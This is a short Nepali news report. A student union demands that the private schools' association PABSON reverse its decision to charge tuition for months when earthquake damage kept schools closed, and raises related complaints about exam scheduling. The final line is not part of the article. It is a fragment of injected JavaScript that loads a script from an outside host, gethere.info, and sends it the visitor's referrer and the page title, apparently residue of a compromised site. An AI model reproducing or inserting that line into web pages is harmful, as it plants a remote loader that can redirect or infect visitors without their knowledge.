अखिल क्रान्तिकारीले भुकम्पका कारण विद्यालय बन्द भएको समयको शुल्क लिने प्याव्सनको निर्णय फिर्ता लिन माग गरेको छ। विहीबार काठमाडौँमा पत्रकार सम्मेलन गर्दै भुकम्पका क्रान्तिककारीले कारण बन्द भएका विद्यालयले शुल्क लिनु प्याव्सको अनैतिक र नाफाखोर प्रवृत्ति भएको जनाएको छ। क्रान्तिकारीका संयोजक रमेश मल्लले नीजि विद्यालयले नपढाएको बेलाको शुल्क लिने निर्णय फिर्ता नलिए आन्दोलनमा उत्रनी चेतावनी दिनुभयो।
निजी तथा आवासीय विद्यालयहरुको छाता संगठन प्याव्सनले बुधबार पत्रकार सम्मेलन गरी नपढाएको महिनाको पनि शिक्षण शुल्क लिने जानकारी गराएको थियो। त्यस्तै अखिल क्रान्तिकारीले काठमाडौं उपत्यकालाई भूकम्पबाट अतिप्रभावित क्षेत्रमा नराखि पहिलो चरणमा नै परीक्षा लिने उच्च माध्यमिक शिक्षा परिषदको निर्णय सच्याउन पनि माग गरेको छ। क्रान्तिकारीले मनोचिकित्सकका सलह र सहयोगमा मनोवैज्ञानिक उपचार विधिबाट तत्काल विद्यालय सञ्चालन गर्नसमेत सरकारको ध्यानाकर्षण गराएको छ।
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;